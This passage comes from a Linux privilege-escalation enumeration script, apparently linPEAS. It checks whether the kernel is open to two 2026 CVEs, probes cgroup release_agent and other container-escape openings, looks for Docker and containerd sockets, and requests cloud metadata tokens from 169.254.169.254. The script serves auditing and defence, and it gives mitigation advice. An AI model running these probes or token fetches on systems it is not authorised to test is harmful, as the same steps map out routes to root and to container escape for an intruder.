df43_ver_range "$DF43_KERNEL_VERSION" 6.13 6.18.28 \ 2605 || df43_ver_range "$DF43_KERNEL_VERSION" 7.0 7.0.5; then 2606 DF43_ESP_AFFECTED="yes" 2607 fi 2608 DF43_RXRPC_AFFECTED="" 2609 if printf '%s' "$DF43_KERNEL_RELEASE" | grep -Eq '^5\.3(\.0)?-rc'; then 2610 printf '%s' "$DF43_KERNEL_RELEASE" | grep -Eq '^5\.3(\.0)?-rc[78]([-.]|$)' && DF43_RXRPC_AFFECTED="yes" 2611 else 2612 if df43_ver_range "$DF43_KERNEL_VERSION" 5.3 6.18.29 \ 2613 || df43_ver_range "$DF43_KERNEL_VERSION" 6.19 7.0.6 \ 2614 || printf '%s' "$DF43_KERNEL_RELEASE" | grep -Eq '^7\.1(\.0)?-rc[12]([-.]|$)'; then 2615 DF43_RXRPC_AFFECTED="yes" 2616 fi 2617 fi 2618 fi 2619 DF43_ESP_MODS="esp4 esp6 xfrm_user ipcomp4 ipcomp6" 2620 DF43_RXRPC_MODS="rxrpc" 2621 DF43_LOADED_ESP="" 2622 DF43_LOADED_RXRPC="" 2623 for DF43_MOD in $DF43_ESP_MODS; do 2624 grep -qE "^${DF43_MOD} " /proc/modules 2>/dev/null \ 2625 && DF43_LOADED_ESP="$DF43_LOADED_ESP $DF43_MOD" 2626 done 2627 for DF43_MOD in $DF43_RXRPC_MODS; do 2628 grep -qE "^${DF43_MOD} " /proc/modules 2>/dev/null \ 2629 && DF43_LOADED_RXRPC="$DF43_LOADED_RXRPC $DF43_MOD" 2630 done 2631 DF43_AUTO_ESP="" 2632 DF43_AUTO_RXRPC="" 2633 DF43_MODDEP="/lib/modules/${DF43_KERNEL_RELEASE}/modules.dep" 2634 if [ -r "$DF43_MODDEP" ]; then 2635 for DF43_MOD in $DF43_ESP_MODS; do 2636 if grep -qE "(^|/)${DF43_MOD}\.ko(\.[a-z]+)?:" "$DF43_MODDEP" 2>/dev/null; then 2637 case " $DF43_LOADED_ESP " in 2638 *" $DF43_MOD "*) : ;; 2639 *) DF43_AUTO_ESP="$DF43_AUTO_ESP $DF43_MOD" ;; 2640 esac 2641 fi 2642 done 2643 for DF43_MOD in $DF43_RXRPC_MODS; do 2644 if grep -qE "(^|/)${DF43_MOD}\.ko(\.[a-z]+)?:" "$DF43_MODDEP" 2>/dev/null; then 2645 case " $DF43_LOADED_RXRPC " in 2646 *" $DF43_MOD "*) : ;; 2647 *) DF43_AUTO_RXRPC="$DF43_AUTO_RXRPC $DF43_MOD" ;; 2648 esac 2649 fi 2650 done 2651 fi 2652 DF43_BUILTIN_ESP="" 2653 DF43_BUILTIN_RXRPC="" 2654 DF43_KCFG="" 2655 for DF43_C in /proc/config.gz "/boot/config-${DF43_KERNEL_RELEASE}" /boot/config; do 2656 [ -r "$DF43_C" ] && { DF43_KCFG="$DF43_C"; break; } 2657 done 2658 if [ -n "$DF43_KCFG" ]; then 2659 case "$DF43_KCFG" in 2660 *.gz) DF43_KCAT="zcat" ;; 2661 *) DF43_KCAT="cat" ;; 2662 esac 2663 $DF43_KCAT "$DF43_KCFG" 2>/dev/null \ 2664 | grep -qE '^(CONFIG_INET_ESP|CONFIG_INET6_ESP|CONFIG_XFRM_USER|CONFIG_INET_IPCOMP|CONFIG_INET6_IPCOMP)=y' \ 2665 && DF43_BUILTIN_ESP="yes" 2666 $DF43_KCAT "$DF43_KCFG" 2>/dev/null \ 2667 | grep -qE '^CONFIG_AF_RXRPC=y' \ 2668 && DF43_BUILTIN_RXRPC="yes" 2669 fi 2670 DF43_MITIG_ESP="" 2671 DF43_MITIG_RXRPC="" 2672 for DF43_MOD in $DF43_ESP_MODS; do 2673 if grep -rEhsq "^[[:space:]]*(blacklist|install)[[:space:]]+${DF43_MOD}\b" \ 2674 /etc/modprobe.d/ /run/modprobe.d/ /usr/lib/modprobe.d/ /lib/modprobe.d/ 2>/dev/null; then 2675 DF43_MITIG_ESP="yes" 2676 break 2677 fi 2678 done 2679 for DF43_MOD in $DF43_RXRPC_MODS; do 2680 if grep -rEhsq "^[[:space:]]*(blacklist|install)[[:space:]]+${DF43_MOD}\b" \ 2681 /etc/modprobe.d/ /run/modprobe.d/ /usr/lib/modprobe.d/ /lib/modprobe.d/ 2>/dev/null; then 2682 DF43_MITIG_RXRPC="yes" 2683 break 2684 fi 2685 done 2686 DF43_USERNS_OFF="" 2687 if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then 2688 [ "$(cat /proc/sys/kernel/unprivileged_userns_clone 2>/dev/null)" = "0" ] \ 2689 && DF43_USERNS_OFF="yes" 2690 fi 2691 if [ -r /proc/sys/user/max_user_namespaces ]; then 2692 [ "$(cat /proc/sys/user/max_user_namespaces 2>/dev/null)" = "0" ] \ 2693 && DF43_USERNS_OFF="yes" 2694 fi 2695 DF43_CAP_NET_ADMIN="" 2696 if [ -r /proc/self/status ]; then 2697 DF43_CAPEFF=$(awk '/^CapEff:/ {print $2}' /proc/self/status 2>/dev/null) 2698 case "$DF43_CAPEFF" in 2699 "" | *[!0-9a-fA-F]*) : ;; 2700 *) 2701 DF43_CAPLO=$(printf '%s' "$DF43_CAPEFF" | tail -c 4) 2702 [ "$(( 0x${DF43_CAPLO} & 0x1000 ))" -ne 0 ] && DF43_CAP_NET_ADMIN="yes" 2703 ;; 2704 esac 2705 fi 2706 DF43_OLDBUILD="" 2707 DF43_BDATE=$(printf '%s' "$DF43_KBUILD" | sed -nE 's/.*([A-Z][a-z]{2} [A-Z][a-z]{2} +[0-9]{1,2} [0-9:]+ (UTC )?[0-9]{4}).*/\1/p') 2708 if [ -z "$DF43_BDATE" ]; then 2709 DF43_BDATE=$(printf '%s' "$DF43_KBUILD" | sed -nE 's/.*\(([0-9]{4}-[0-9]{2}-[0-9]{2})\).*/\1/p') 2710 fi 2711 if [ -n "$DF43_BDATE" ]; then 2712 DF43_BE=$(date -d "$DF43_BDATE" +%s 2>/dev/null) 2713 DF43_FE=$(date -d '2026-05-08' +%s 2>/dev/null) 2714 if [ -n "$DF43_BE" ] && [ -n "$DF43_FE" ] && [ "$DF43_BE" -lt "$DF43_FE" ]; then 2715 DF43_OLDBUILD="yes" 2716 fi 2717 fi 2718 if [ -n "$DF43_LOADED_ESP" ]; then 2719 if [ "$DF43_ESP_AFFECTED" = "yes" ]; then 2720 echo "CVE-2026-43284 (xfrm-ESP): loaded:$DF43_LOADED_ESP" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2721 else 2722 echo "CVE-2026-43284 (xfrm-ESP): loaded:$DF43_LOADED_ESP but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN}," 2723 fi 2724 elif [ "$DF43_BUILTIN_ESP" = "yes" ]; then 2725 if [ "$DF43_ESP_AFFECTED" = "yes" ]; then 2726 echo "CVE-2026-43284 (xfrm-ESP): built into kernel (modprobe blacklist ineffective)" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2727 else 2728 echo "CVE-2026-43284 (xfrm-ESP): built into kernel, but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN}," 2729 fi 2730 elif [ -n "$DF43_AUTO_ESP" ]; then 2731 if [ "$DF43_ESP_AFFECTED" = "yes" ]; then 2732 echo "CVE-2026-43284 (xfrm-ESP): autoloadable:$DF43_AUTO_ESP" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2733 else 2734 echo "CVE-2026-43284 (xfrm-ESP): autoloadable:$DF43_AUTO_ESP but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN}," 2735 fi 2736 else 2737 echo "CVE-2026-43284 (xfrm-ESP): not reachable on this kernel" | sed -${E} "s,.*,${SED_GREEN}," 2738 fi 2739 if [ -n "$DF43_LOADED_RXRPC" ]; then 2740 if [ "$DF43_RXRPC_AFFECTED" = "yes" ]; then 2741 echo "CVE-2026-43500 (rxrpc): loaded:$DF43_LOADED_RXRPC" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2742 else 2743 echo "CVE-2026-43500 (rxrpc): loaded:$DF43_LOADED_RXRPC but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN}," 2744 fi 2745 elif [ "$DF43_BUILTIN_RXRPC" = "yes" ]; then 2746 if [ "$DF43_RXRPC_AFFECTED" = "yes" ]; then 2747 echo "CVE-2026-43500 (rxrpc): built into kernel (modprobe blacklist ineffective)" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2748 else 2749 echo "CVE-2026-43500 (rxrpc): built into kernel, but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN}," 2750 fi 2751 elif [ -n "$DF43_AUTO_RXRPC" ]; then 2752 if [ "$DF43_RXRPC_AFFECTED" = "yes" ]; then 2753 echo "CVE-2026-43500 (rxrpc): autoloadable:$DF43_AUTO_RXRPC" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2754 else 2755 echo "CVE-2026-43500 (rxrpc): autoloadable:$DF43_AUTO_RXRPC but kernel $DF43_KERNEL_RELEASE is outside known affected ranges" | sed -${E} "s,.*,${SED_GREEN}," 2756 fi 2757 else 2758 echo "CVE-2026-43500 (rxrpc): not reachable on this kernel" | sed -${E} "s,.*,${SED_GREEN}," 2759 fi 2760 if [ "$DF43_MITIG_ESP" = "yes" ]; then 2761 echo "modprobe mitigation (xfrm-ESP): present" | sed -${E} "s,.*,${SED_GREEN}," 2762 else 2763 echo "modprobe mitigation (xfrm-ESP): not found" | sed -${E} "s,.*,${SED_YELLOW}," 2764 fi 2765 if [ "$DF43_MITIG_RXRPC" = "yes" ]; then 2766 echo "modprobe mitigation (rxrpc): present" | sed -${E} "s,.*,${SED_GREEN}," 2767 else 2768 echo "modprobe mitigation (rxrpc): not found" | sed -${E} "s,.*,${SED_YELLOW}," 2769 fi 2770 if [ "$DF43_USERNS_OFF" = "yes" ]; then 2771 echo "Unprivileged user namespaces: disabled (breaks the public PoC)" | sed -${E} "s,.*,${SED_GREEN}," 2772 else 2773 echo "Unprivileged user namespaces: enabled" | sed -${E} "s,.*,${SED_YELLOW}," 2774 fi 2775 if [ "$DF43_CAP_NET_ADMIN" = "yes" ]; then 2776 echo "Current process: CAP_NET_ADMIN present (matches public PoC requirement)" | sed -${E} "s,.*,${SED_RED_YELLOW}," 2777 fi 2778 if [ "$DF43_OLDBUILD" = "yes" ]; then 2779 echo "Kernel build predates upstream fix (2026-05-08): likely unpatched unless distro backport." | sed -${E} "s,.*,${SED_YELLOW}," 2780 fi 2781 DF43_ESP_REACH="" 2782 [ -n "$DF43_LOADED_ESP$DF43_AUTO_ESP" ] && DF43_ESP_REACH="yes" 2783 [ "$DF43_BUILTIN_ESP" = "yes" ] && DF43_ESP_REACH="yes" 2784 DF43_RXRPC_REACH="" 2785 [ -n "$DF43_LOADED_RXRPC$DF43_AUTO_RXRPC" ] && DF43_RXRPC_REACH="yes" 2786 [ "$DF43_BUILTIN_RXRPC" = "yes" ] && DF43_RXRPC_REACH="yes" 2787 DF43_RC=0 2788 if [ "$DF43_ESP_REACH" = "yes" ] && [ "$DF43_MITIG_ESP" != "yes" ]; then 2789 if [ "$DF43_ESP_AFFECTED" != "yes" ]; then 2790 : 2791 elif [ "$DF43_USERNS_OFF" = "yes" ]; then 2792 echo "CVE-2026-43284 reachable but public PoC blocked by disabled user namespaces." | sed -${E} "s,.*,${SED_YELLOW}," 2793 [ $DF43_RC -lt 1 ] && DF43_RC=1 2794 else 2795 echo "LIKELY VULNERABLE to CVE-2026-43284 (xfrm-ESP)." | sed -${E} "s,.*,${SED_RED_YELLOW}," 2796 DF43_RC=2 2797 fi 2798 fi 2799 if [ "$DF43_RXRPC_REACH" = "yes" ] && [ "$DF43_MITIG_RXRPC" != "yes" ]; then 2800 if [ "$DF43_RXRPC_AFFECTED" != "yes" ]; then 2801 : 2802 elif [ "$DF43_USERNS_OFF" = "yes" ]; then 2803 echo "CVE-2026-43500 reachable but public PoC blocked by disabled user namespaces." | sed -${E} "s,.*,${SED_YELLOW}," 2804 [ $DF43_RC -lt 1 ] && DF43_RC=1 2805 else 2806 echo "LIKELY VULNERABLE to CVE-2026-43500 (rxrpc)." | sed -${E} "s,.*,${SED_RED_YELLOW}," 2807 DF43_RC=2 2808 fi 2809 fi 2810 if [ $DF43_RC -gt 0 ]; then 2811 echo "Mitigation: 'install esp4/esp6/rxrpc /bin/false' in /etc/modprobe.d/, then rmmod;" 2812 echo "or sysctl kernel.unprivileged_userns_clone=0; or apply distro patches." 2813 fi 2814 exit $DF43_RC 2815 ) 2816 } 2817 2818 checkCreateReleaseAgent(){ 2819 release_agent_breakout3="${release_agent_breakout3:-No}" 2820 for ss in $(awk -F: '/^[0-9]+:/{print $2}' /proc/$$/cgroup 2>/dev/null); do 2821 if unshare -UrmC --propagation=unchanged sh -c "mount -t cgroup -o $ss cgroup /tmp/cgroup_3628d4 >/dev/null 2>&1 && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then 2822 release_agent_breakout3="Yes (unshare with $ss)" 2823 umount /tmp/cgroup_3628d4 >/dev/null 2>&1 2824 rm -rf /tmp/cgroup_3628d4 >/dev/null 2>&1 2825 break 2826 fi 2827 umount /tmp/cgroup_3628d4 >/dev/null 2>&1 2828 rm -rf /tmp/cgroup_3628d4 >/dev/null 2>&1 2829 done 2830 } 2831 2832 checkDockerRootless() { 2833 DOCKER_ROOTLESS="No" 2834 if docker info 2>/dev/null|grep -q rootless; then 2835 DOCKER_ROOTLESS="Yes ($TIP_DOCKER_ROOTLESS)" 2836 fi 2837 } 2838 2839 echo_no (){ 2840 printf $DG"No\n"$NC 2841 } 2842 2843 enumerateDockerDesktopAPI() { 2844 if ! [ "$SEARCHED_DOCKER_DESKTOP_API" ]; then 2845 SEARCHED_DOCKER_DESKTOP_API="1" 2846 # Docker Desktop exposes its internal Engine API on the VM services host 192.168.65.7. 2847 # CVE-2025-9074 (fixed in Docker Desktop 4.44.3) let a container reach this UNAUTHENTICATED 2848 # Engine API on 192.168.65.7:2375 even when /var/run/docker.sock was NOT mounted, enabling a 2849 # full container escape (e.g. creating a container that bind-mounts the host filesystem). 2850 # Ref: https://nvd.nist.gov/vuln/detail/CVE-2025-9074 2851 ddEndpoint="http://192.168.65.7:2375/info" 2852 ddInfoResponse="" 2853 if [ "$(command -v curl 2>/dev/null || echo -n '')" ]; then 2854 ddInfoResponse="$(curl -s --max-time 3 "$ddEndpoint" 2>/dev/null)" 2855 elif [ "$(command -v wget 2>/dev/null || echo -n '')" ]; then 2856 ddInfoResponse="$(wget -q -T 3 -O - "$ddEndpoint" 2>/dev/null)" 2857 fi 2858 if echo "$ddInfoResponse" | grep -q "ServerVersion"; then 2859 echo "Docker Desktop internal Engine API (CVE-2025-9074) reachable at 192.168.65.7:2375 - container escape possible!" | sed -${E} "s,reachable at 192.168.65.7:2375,${SED_RED_YELLOW},g" 2860 echo "$ddInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' 2861 fi 2862 fi 2863 } 2864 2865 inDockerGroup() { 2866 DOCKER_GROUP="No" 2867 if groups 2>/dev/null | grep -q '\bdocker\b'; then 2868 DOCKER_GROUP="Yes" 2869 fi 2870 } 2871 2872 checkDockerVersionExploits() { 2873 if echo "$dockerVersion" | grep -iq "not found"; then 2874 VULN_CVE_2019_13139="$(echo_not_found)" 2875 VULN_CVE_2019_5736="$(echo_not_found)" 2876 VULN_CVE_2021_41091="$(echo_not_found)" 2877 return 2878 fi 2879 VULN_CVE_2019_13139="$(echo_no)" 2880 if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then 2881 VULN_CVE_2019_13139="Yes" 2882 fi 2883 VULN_CVE_2019_5736="$(echo_no)" 2884 if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then 2885 VULN_CVE_2019_5736="Yes" 2886 fi 2887 VULN_CVE_2021_41091="$(echo_no)" 2888 if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "20109" ]; then 2889 VULN_CVE_2021_41091="Yes" 2890 fi 2891 } 2892 2893 checkProcSysBreakouts(){ 2894 can_open_for_write() { 2895 if [ -e "$1" ] && command -v dd >/dev/null 2>&1 && dd if=/dev/null of="$1" bs=1 count=0 conv=notrunc >/dev/null 2>&1; then 2896 echo Yes 2897 else 2898 echo No 2899 fi 2900 } 2901 dev_mounted="No" 2902 if [ $(ls -l /dev | grep -E "^c" | wc -l) -gt 50 ]; then 2903 dev_mounted="Yes"; 2904 fi 2905 proc_mounted="No" 2906 if [ $(ls /proc | grep -E "^[0-9]" | wc -l) -gt 50 ]; then 2907 proc_mounted="Yes"; 2908 fi 2909 if command -v unshare >/dev/null 2>&1 && command -v sh >/dev/null 2>&1; then 2910 run_unshare=$(unshare -UrmC sh -c 'echo -n Yes' 2>/dev/null) 2911 fi 2912 if ! [ "$run_unshare" = "Yes" ]; then 2913 run_unshare="No" 2914 fi 2915 if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then 2916 release_agent_breakout1="Yes" 2917 else 2918 release_agent_breakout1="No" 2919 fi 2920 release_agent_breakout2="No" 2921 mkdir -p /tmp/cgroup_3628d4 2922 mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null 2923 if [ $? -eq 0 ]; then 2924 release_agent_breakout2="Yes"; 2925 umount /tmp/cgroup_3628d4 >/dev/null 2>&1 2926 rm -rf /tmp/cgroup_3628d4 2927 else 2928 mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null 2929 if [ $? -eq 0 ]; then 2930 release_agent_breakout2="Yes"; 2931 umount /tmp/cgroup_3628d4 >/dev/null 2>&1 2932 rm -rf /tmp/cgroup_3628d4 2933 else 2934 checkCreateReleaseAgent 2935 fi 2936 fi 2937 rm -rf /tmp/cgroup_3628d4 2>/dev/null 2938 # Prefer zero-byte open-for-write checks here so special files are validated more accurately without trying to change their contents. 2939 core_pattern_breakout="$(can_open_for_write /proc/sys/kernel/core_pattern)" 2940 modprobe_binary="$(ls -l "$(cat /proc/sys/kernel/modprobe 2>/dev/null)" 2>/dev/null || echo No)" 2941 modprobe_config_writable="$(can_open_for_write /proc/sys/kernel/modprobe)" 2942 panic_on_oom_dos="$(can_open_for_write /proc/sys/vm/panic_on_oom)" 2943 panic_sys_fs_dos="$(can_open_for_write /proc/sys/fs/suid_dumpable)" 2944 binfmt_misc_breakout="$(can_open_for_write /proc/sys/fs/binfmt_misc/register)" 2945 proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)" 2946 sysreq_trigger_dos="$(can_open_for_write /proc/sysrq-trigger)" 2947 kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)" # Kernel Exploit Dev 2948 kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev 2949 self_mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)" 2950 if [ "$(head -n 1 /proc/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi 2951 kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)" 2952 kmem_writable="$(can_open_for_write /proc/kmem)" 2953 mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)" 2954 mem_writable="$(can_open_for_write /proc/mem)" 2955 sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)" 2956 mountinfo_readable="No" 2957 for mountinfo_file in /proc/[0-9]*/mountinfo; do 2958 if [ -r "$mountinfo_file" ]; then 2959 mountinfo_readable="Yes" 2960 break 2961 fi 2962 done 2963 uevent_helper_breakout="$(can_open_for_write /sys/kernel/uevent_helper)" 2964 vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)" 2965 security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)" 2966 security_writable="$([ -w /sys/kernel/security ] 2>/dev/null && echo Yes || echo No)" 2967 efi_vars_writable="$([ -w /sys/firmware/efi/vars ] 2>/dev/null && echo Yes || echo No)" 2968 efi_efivars_writable="$([ -w /sys/firmware/efi/efivars ] 2>/dev/null && echo Yes || echo No)" 2969 proc_keys_readable="$( (head -n 1 /proc/keys > /dev/null && echo Yes) 2>/dev/null || echo No)" 2970 proc_timer_list_readable="$( (head -n 1 /proc/timer_list > /dev/null && echo Yes) 2>/dev/null || echo No)" 2971 sys_firmware_readable="$([ -r /sys/firmware ] 2>/dev/null && echo Yes || echo No)" 2972 debugfs_present="$([ -d /sys/kernel/debug ] 2>/dev/null && echo Yes || echo No)" 2973 debugfs_readable="$( (ls -la /sys/kernel/debug > /dev/null && echo Yes) 2>/dev/null || echo No)" 2974 thermal_present="$([ -d /sys/class/thermal ] 2>/dev/null && echo Yes || echo No)" 2975 thermal_readable="No" 2976 for thermal_file in /sys/class/thermal/*/*; do 2977 if [ -f "$thermal_file" ] && [ -r "$thermal_file" ]; then 2978 thermal_readable="Yes" 2979 break 2980 fi 2981 done 2982 } 2983 2984 checkContainerExploits() { 2985 VULN_CVE_2019_5021="$(echo_no)" 2986 if [ -f "/etc/alpine-release" ]; then 2987 alpineVersion=$(cat /etc/alpine-release) 2988 if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then 2989 VULN_CVE_2019_5021="Yes" 2990 fi 2991 fi 2992 } 2993 2994 enumerateDockerSockets() { 2995 dockerVersion="$(echo_not_found)" 2996 if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then 2997 SEARCHED_DOCKER_SOCKETS="1" 2998 OLDIFS="$IFS" 2999 IFS=' 3000 ' 3001 # NOTE: This is intentionally "lightweight" (checks common runtime socket names) and avoids 3002 # pseudo filesystems (/sys, /proc) to reduce noise and latency. 3003 for int_sock in $(find / \ 3004 -path "/sys" -prune -o \ 3005 -path "/proc" -prune -o \ 3006 -type s \( \ 3007 -name "docker.sock" -o \ 3008 -name "docker.socket" -o \ 3009 -name "cri-dockerd.sock" -o \ 3010 -name "dockershim.sock" -o \ 3011 -name "containerd.sock" -o \ 3012 -name "containerd.sock.ttrpc" -o \ 3013 -name "crio.sock" -o \ 3014 -name "podman.sock" -o \ 3015 -name "kubelet.sock" -o \ 3016 -name "buildkitd.sock" -o \ 3017 -name "buildkit.sock" -o \ 3018 -name "firecracker-containerd.sock" -o \ 3019 -name "frakti.sock" -o \ 3020 -name "rktlet.sock" \ 3021 \) -print 2>/dev/null); do 3022 # Basic permissions hint (you generally need write perms to connect to a unix socket). 3023 if [ -w "$int_sock" ]; then 3024 if echo "$int_sock" | grep -Eq "docker"; then 3025 echo "You have write permissions over Docker socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED_YELLOW},g" 3026 else 3027 echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g" 3028 fi 3029 else 3030 echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g" 3031 fi 3032 # Validate whether this looks like a Docker-compatible API socket (amicontained-style) when curl exists. 3033 docker_enumerated="" 3034 if [ "$(command -v curl 2>/dev/null || echo -n '')" ]; then 3035 sockInfoResponse="$(curl -s --max-time 2 --unix-socket "$int_sock" http://localhost/info 2>/dev/null)" 3036 if echo "$sockInfoResponse" | grep -q "ServerVersion"; then 3037 echo "Valid Docker API socket: $int_sock" | sed -${E} "s,$int_sock,${SED_RED_YELLOW},g" 3038 dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) 3039 echo "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' 3040 docker_enumerated="1" 3041 fi 3042 fi 3043 # Fallback to docker CLI if curl is missing or the /info request didn't work. 3044 # Use DOCKER_HOST so we can target non-default socket paths when possible. 3045 if [ "$(command -v docker 2>/dev/null || echo -n '')" ] && ! [ "$docker_enumerated" ]; then 3046 if [ -w "$int_sock" ] && echo "$int_sock" | grep -Eq "docker"; then 3047 sockInfoResponse="$(DOCKER_HOST="unix://$int_sock" docker info 2>/dev/null)" 3048 if [ "$sockInfoResponse" ]; then 3049 dockerVersion=$(echo "$sockInfoResponse" | grep -i "^ Server Version:" | awk '{print $4}' | head -n 1) 3050 printf "%s\n" "$sockInfoResponse" | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' 3051 fi 3052 fi 3053 fi 3054 done 3055 IFS="$OLDIFS" 3056 fi 3057 } 3058 3059 containerCheck() { 3060 inContainer="" 3061 containerType="$(echo_no)" 3062 # Are we inside docker? 3063 if [ -f "/.dockerenv" ] || 3064 grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || 3065 grep -qai docker /proc/self/cgroup 2>/dev/null || 3066 [ -f "/run/.dockerenv" ] ; then 3067 inContainer="1" 3068 containerType="docker\n" 3069 fi 3070 # Are we inside kubenetes? 3071 if grep "/kubepod" /proc/1/cgroup -qa 2>/dev/null || 3072 grep -qai kubepods /proc/self/cgroup 2>/dev/null; then 3073 inContainer="1" 3074 if [ "$containerType" ]; then containerType="$containerType (kubernetes)\n" 3075 else containerType="kubernetes\n" 3076 fi 3077 fi 3078 # Inside concourse? 3079 if grep "/concourse" /proc/1/mounts -qa 2>/dev/null; then 3080 inContainer="1" 3081 if [ "$containerType" ]; then 3082 containerType="$containerType (concourse)\n" 3083 fi 3084 fi 3085 # Are we inside LXC? 3086 if env | grep "container=lxc" -qa 2>/dev/null || 3087 grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then 3088 inContainer="1" 3089 if echo "$containerType" | grep -qv "lxc"; then 3090 if [ "$containerType" ] && [ "$containerType" != "$(echo_no)" ]; then containerType="$containerType (lxc)\n" 3091 else containerType="lxc\n" 3092 fi 3093 fi 3094 fi 3095 # Are we inside podman? 3096 if [ -f "/run/.containerenv" ] || 3097 env | grep -qa "container=podman" 2>/dev/null || 3098 grep -qa "container=podman" /proc/1/environ 2>/dev/null; then 3099 inContainer="1" 3100 if echo "$containerType" | grep -qv "podman"; then 3101 if [ "$containerType" ] && [ "$containerType" != "$(echo_no)" ]; then containerType="$containerType (podman)\n" 3102 else containerType="podman\n" 3103 fi 3104 fi 3105 fi 3106 # Check for other container platforms that report themselves in PID 1 env 3107 if [ -z "$inContainer" ]; then 3108 if grep -qa 'container=' /proc/1/environ 2>/dev/null; then 3109 inContainer="1" 3110 containerType="$(tr '\000' '\n' < /proc/1/environ 2>/dev/null | awk -F= '/^container=/{print $2; exit}')\n" 3111 fi 3112 fi 3113 } 3114 3115 check_ibm_vm(){ 3116 is_ibm_vm="No" 3117 if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then 3118 curl --connect-timeout 2 "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1 "http://169.254.169.254" > /dev/null 2>&1 3119 if [ "$?" -eq 0 ]; then 3120 IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) ) 3121 is_ibm_vm="Yes" 3122 fi 3123 fi 3124 } 3125 3126 check_az_automation_acc(){ 3127 is_az_automation_acc="No" 3128 if env | grep -iq "azure" && env | grep -iq "AutomationServiceEndpoint"; then 3129 is_az_automation_acc="Yes" 3130 fi 3131 } 3132 3133 check_do(){ 3134 is_do="No" 3135 if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then 3136 is_do="Yes" 3137 fi 3138 } 3139 3140 check_tencent_cvm () { 3141 is_tencent_cvm="No" 3142 if grep -qi Tencent /etc/cloud/cloud.cfg 2>/dev/null; then 3143 is_tencent_cvm="Yes" 3144 fi 3145 } 3146 3147 check_aliyun_ecs(){ 3148 is_aliyun_ecs="No" 3149 if [ -f "/etc/cloud/cloud.cfg.d/aliyun_cloud.cfg" ]; then 3150 is_aliyun_ecs="Yes" 3151 fi 3152 } 3153 3154 check_aws_ec2(){ 3155 is_aws_ec2="No" 3156 is_aws_ec2_beanstalk="No" 3157 if [ -d "/var/log/amazon/" ]; then 3158 is_aws_ec2="Yes" 3159 EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) 3160 else 3161 EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header 